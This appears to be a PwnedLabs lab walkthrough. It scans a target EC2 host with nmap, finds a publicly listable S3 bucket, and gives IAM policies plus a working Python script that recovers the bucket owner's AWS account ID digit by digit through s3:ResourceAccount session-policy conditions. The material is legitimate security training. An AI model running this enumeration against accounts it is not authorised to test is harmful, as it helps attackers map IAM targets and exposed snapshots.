PWNEDLABS

Identify the AWS Account ID from a Public S3 Bucket

Scenario

The ability to expose and leverage even the smallest oversights is a coveted skill. A global Logistics Company has reached out to our cybersecurity company for assistance and have provided the IP address of their website. Your objective? Start the engagement and use this IP address to identify their AWS account ID via a public S3 bucket so we can commence the process of enumeration.

Lab prerequisites

  • Basic Linux command line knowledge

Learning outcomes

  • Knowledge of a technique that can be used to find AWS Account IDs

  • Understanding what a tool does by performing a code review

Difficulty

Foundations

Focus

Red

Real-world context

If threat actors get their hands on an AWS Account ID, they can try to identify the IAM roles and users tied to that account. They can do this by taking advantage of detailed error messages that AWS services return when inputting an incorrect username or role name. These messages can verify if an IAM user or role exists, which can help threat actors compile a list of possible targets in the AWS account. It's also possible to filter public EBS and RDS snapshots by the AWS Account ID that owns it.

Walkthrough

Enumeration

Let's start by scanning the IP address with Nmap. Two ports are open: 53 (ISC BIND) and 80 (Apache). The reverse DNS name ec2-54-204-171-32.compute-1.amazonaws.com also tells us the host is an EC2 instance in us-east-1. Port 80 is serving a website, so let's open it in a browser.

Nmap Result
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -A 54.204.171.32 -T4       
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-16 18:28 EST
Nmap scan report for ec2-54-204-171-32.compute-1.amazonaws.com (54.204.171.32)
Host is up (0.083s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
53/tcp open  domain  ISC BIND 9.16.23 (RedHat Linux)
| dns-nsid: 
|_  bind.version: 9.16.23-RH
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Mega Big Tech
|_http-server-header: Apache/2.4.52 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router|storage-misc
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X|5.X (87%), MikroTik RouterOS 7.X (85%), Synology DiskStation Manager 5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 2.6.32 (87%), Linux 2.6.32 - 3.13 (87%), Linux 3.10 - 4.11 (87%), Linux 3.2 - 4.14 (87%), Linux 3.4 - 3.10 (87%), Linux 4.15 - 5.19 (87%), Linux 5.0 - 5.14 (87%), Linux 5.1 - 5.15 (87%), Linux 2.6.32 - 3.10 (86%), Linux 2.6.39 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 25 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   2.14 ms   192.168.0.1
2   4.82 ms   10.14.161.1
3   3.32 ms   150.129.109.73
4   3.73 ms   10.241.1.6
5   5.77 ms   10.240.254.53
6   ... 7
8   6.36 ms   10.240.246.1
9   5.23 ms   10.200.22.1
10  63.77 ms  static-65.115.194.14-tataidc.co.in (14.194.115.65)
11  4.10 ms   10.124.248.81
12  13.20 ms  115.113.172.125.static-kolkata.vsnl.net.in (115.113.172.125)
13  37.84 ms  172.23.183.134
14  39.51 ms  ix-ae-0-100.tcore1.mlv-mumbai.as6453.net (180.87.38.5)
15  257.41 ms if-be-13-2.ecore1.mlv-mumbai.as6453.net (180.87.38.29)
16  260.83 ms if-be-47-2.ecore1.emrs2-marseille.as6453.net (80.231.217.52)
17  ...
18  269.00 ms 63.243.137.148
19  ... 24
25  251.01 ms ec2-54-204-171-32.compute-1.amazonaws.com (54.204.171.32)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.79 seconds

This reveals the website of the company Mega Big Tech. There doesn't seem to be any interesting functionality, so let's check the page source.

Mega Big Tech

The source reveals that the product images are hosted in an Amazon S3 bucket named mega-big-tech, referenced directly by its s3.amazonaws.com URL.

<section class="product-mac">
    <div class="container">
      <h2>WorkPro</h2>
      <div class="grid">
        <div class="grid-product">
          <img src="https://mega-big-tech.s3.amazonaws.com/images/workpro1.jpg">
          <div class="grid-detail">
            <p>WorkPro</p>
            <p>From $5,000</p>
          </div>
        </div>
      </div>
    </div>
</section>

Requesting the bucket root (https://mega-big-tech.s3.amazonaws.com/) in the browser returns a ListBucketResult, which means anonymous listing is enabled on the bucket. It contains an images directory with the other product images, but nothing sensitive.

<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>mega-big-tech</Name><Prefix></Prefix><Marker></Marker><MaxKeys>1000</MaxKeys><IsTruncated>false</IsTruncated>
  <Contents><Key>images/</Key><LastModified>2023-06-25T22:40:57.000Z</LastModified><ETag>&quot;d41d8cd98f00b204e9800998ecf8427e&quot;</ETag><Size>0</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/banner.jpg</Key><LastModified>2023-06-25T22:42:34.000Z</LastModified><ETag>&quot;3ad5c014c01ffeb0743182379d2cd80d&quot;</ETag><Size>3184176</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/notepro1.jpg</Key><LastModified>2023-06-25T22:42:35.000Z</LastModified><ETag>&quot;f5435f26a11fac38006d8fe32ed75045&quot;</ETag><Size>941294</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/notepro2.jpg</Key><LastModified>2023-06-25T22:42:36.000Z</LastModified><ETag>&quot;c7b217afa365714334597643889c5daa&quot;</ETag><Size>1660205</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/notepro3.jpg</Key><LastModified>2023-06-25T22:42:37.000Z</LastModified><ETag>&quot;11acc403ec7efabdf2743404e1fc6be7&quot;</ETag><Size>490794</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/notepro4.jpg</Key><LastModified>2023-06-25T22:42:38.000Z</LastModified><ETag>&quot;2ba1a84a0908e91bec8d05981c28fc40&quot;</ETag><Size>2415092</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/phonepro1.jpg</Key><LastModified>2023-06-25T22:42:39.000Z</LastModified><ETag>&quot;8b2541f6138dd34e392f45fc6ab8ba6f&quot;</ETag><Size>1003564</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/phonepro2.jpg</Key><LastModified>2023-06-25T22:42:40.000Z</LastModified><ETag>&quot;f9bf19e16a9a31a6754d7c55d0576ec4&quot;</ETag><Size>1277058</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/phonepro3.jpg</Key><LastModified>2023-06-25T22:42:41.000Z</LastModified><ETag>&quot;c5e3b974eb2a8cc3cb6cd7f14a358419&quot;</ETag><Size>2322525</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/phonepro4.jpg</Key><LastModified>2023-06-25T22:42:42.000Z</LastModified><ETag>&quot;e77b77f088be31b907562c1c08d3c1ea&quot;</ETag><Size>4080373</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/watchpro1.jpg</Key><LastModified>2023-06-25T22:42:43.000Z</LastModified><ETag>&quot;8c6b69baa95f5a7ed0f9d2e1dae73160&quot;</ETag><Size>1160096</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/watchpro2.jpg</Key><LastModified>2023-06-25T22:42:44.000Z</LastModified><ETag>&quot;ab66d316fbdfa90eea53e89855dc243f&quot;</ETag><Size>2877784</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/watchpro3.jpg</Key><LastModified>2023-06-25T22:42:46.000Z</LastModified><ETag>&quot;a105349b350b257b05438dbc1c8fbe4d&quot;</ETag><Size>3232387</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/watchpro4.jpg</Key><LastModified>2023-06-25T22:42:47.000Z</LastModified><ETag>&quot;f5315cb77b5de5a74c13417e185d3953&quot;</ETag><Size>3041540</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/watchpro5.jpg</Key><LastModified>2023-06-25T22:42:49.000Z</LastModified><ETag>&quot;f137be90eec86dd71da37f25bdc5452e&quot;</ETag><Size>3400957</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/workpro1.jpg</Key><LastModified>2023-06-25T22:42:50.000Z</LastModified><ETag>&quot;ee9140f394608d8ed638c9b39b9c1c4f&quot;</ETag><Size>1632585</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/workpro2.jpg</Key><LastModified>2023-06-25T22:42:51.000Z</LastModified><ETag>&quot;fd33607a6406f4a6cb1550cba96ea200&quot;</ETag><Size>1081259</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/workpro3.jpg</Key><LastModified>2023-06-25T22:42:54.000Z</LastModified><ETag>&quot;78fec3d6d2c81294346fa618ba0caf00&quot;</ETag><Size>1599810</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>images/workpro4.jpg</Key><LastModified>2023-06-25T22:42:56.000Z</LastModified><ETag>&quot;9a70d62b2f2bd2bf6604943bde09f6bd&quot;</ETag><Size>1144134</Size><StorageClass>STANDARD</StorageClass></Contents>
</ListBucketResult>

With the bucket name we can attempt to identify the AWS account it is hosted in. Research by Ben Bridts showed that the account ID owning any S3 bucket you can reach can be brute-forced quickly. Reading the research post and reviewing the code of the accompanying tool is recommended, but the TL;DR is this: the script assumes a role while passing a session policy that uses the s3:ResourceAccount condition key, so S3 only grants the session access to the bucket if the account that owns the bucket satisfies the condition. The script does not have to guess all 10^12 possible 12-digit account IDs: the condition uses StringLike with a trailing wildcard, so each request only tests whether the account ID starts with a given prefix. For each position it tries the digits 0 to 9, keeps the digit for which the request succeeds, appends it to the known prefix and repeats. Because every position costs at most 10 requests, the full account ID is recovered in at most 120 requests.

If you do not have access to an AWS account, we have provided an IAM user and a role it can assume so you can carry out this attack. If you would rather set up the user and role yourself, create the policies below.

The IAM user assuming the role would have the following policy attached.

{
    "Version": "2012-10-17",
    "Statement": {
        "Effect": "Allow",
        "Action": "sts:AssumeRole",
        "Resource": "arn:aws:iam::<your aws account id>:role/<your role name>"
    }
}

The role that your user is allowed to assume has the following policy attached, granting s3:GetObject and s3:ListBucket on the mega-big-tech bucket. The role's trust policy must also list your IAM user as a principal allowed to assume it, otherwise the sts:AssumeRole call is denied before any session policy is evaluated.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "Enum",
            "Effect": "Allow",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::mega-big-tech/*"
        },
        {
            "Sid": "Enum1",
            "Effect": "Allow",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::mega-big-tech"
        }
    ]
}
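The digit-by-digit recovery described above, together with the role setup, as an added example in Python. This is not the lab's code nor the s3-account-search tool itself; it assumes you can assume a role carrying the Enum/Enum1 policy, and the role ARN and bucket name passed to aws_oracle are placeholders. The session policy is the one piece that does the work: the permissions of an assumed session are the intersection of the role policy and the session policy, so the list call only succeeds when the bucket owner matches the s3:ResourceAccount pattern. The fake_oracle emulates that condition offline against a constructed account ID so the search logic can be run without AWS.

```python
"""Recover the AWS account ID that owns an S3 bucket, one digit at a time.

Added example, not the lab's or s3-account-search's own code. Assumptions:
  * ROLE_ARN points at a role you may assume whose policy grants
    s3:ListBucket on the target bucket (the Enum/Enum1 policy above);
  * the bucket owner is a 12-digit account ID, so at most 12 * 10 probes.
"""
import fnmatch
import json

DIGITS = "0123456789"
ACCOUNT_ID_LENGTH = 12


def session_policy(pattern: str) -> dict:
    """Session policy handed to sts:AssumeRole. The effective permissions are
    the intersection of the role policy and this document, so the session can
    only read the bucket when its owner account matches `pattern`."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": ["s3:ListBucket", "s3:GetObject"],
                "Resource": "*",
                "Condition": {"StringLike": {"s3:ResourceAccount": [pattern]}},
            }
        ],
    }


def find_account_id(probe, length=ACCOUNT_ID_LENGTH):
    """probe(pattern) returns True when access is granted under a session
    policy whose s3:ResourceAccount StringLike value is `pattern`.
    Returns (account_id, number_of_probes_used)."""
    known = ""
    probes = 0
    for _ in range(length):
        for digit in DIGITS:
            probes += 1
            if probe(known + digit + "*"):
                known += digit
                break
        else:
            # Not even "<prefix>d*" for any d matched: the role cannot read the
            # bucket at all, so the oracle is not giving us a signal.
            raise RuntimeError(f"no digit matched after prefix {known!r}")
    return known, probes


def fake_oracle(owner_account: str):
    """Offline stand-in for AWS: emulates StringLike on s3:ResourceAccount.
    `owner_account` is constructed test data, not a real account."""
    def probe(pattern):
        return fnmatch.fnmatchcase(owner_account, pattern)
    return probe


def aws_oracle(role_arn: str, bucket: str):
    """Live oracle: assume the role with the restricting session policy and
    try to list a single key. AccessDenied means the pattern did not match."""
    import boto3  # imported lazily so the file also runs offline
    from botocore.exceptions import ClientError

    sts = boto3.client("sts")

    def probe(pattern):
        creds = sts.assume_role(
            RoleArn=role_arn,
            RoleSessionName="s3-account-search",
            Policy=json.dumps(session_policy(pattern)),
        )["Credentials"]
        s3 = boto3.client(
            "s3",
            aws_access_key_id=creds["AccessKeyId"],
            aws_secret_access_key=creds["SecretAccessKey"],
            aws_session_token=creds["SessionToken"],
        )
        try:
            s3.list_objects_v2(Bucket=bucket, MaxKeys=1)
            return True
        except ClientError as err:
            if err.response["Error"]["Code"] == "AccessDenied":
                return False
            raise  # any other error is a real failure, not a mismatch
    return probe


if __name__ == "__main__":
    # Offline run against a constructed owner account.
    account, used = find_account_id(fake_oracle("123456789012"))
    print(f"recovered {account} in {used} probes (worst case {10 * ACCOUNT_ID_LENGTH})")
    # Live run (placeholders; needs credentials for the IAM user that may assume the role):
    # print(find_account_id(aws_oracle(
    #     "arn:aws:iam::<your aws account id>:role/<your role name>", "mega-big-tech")))
```

Note that the role lives in your own account and the target bucket is only ever hit with list requests, so nothing in the victim's IAM configuration is touched; the signal comes entirely from whether your own session policy lets the request through.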
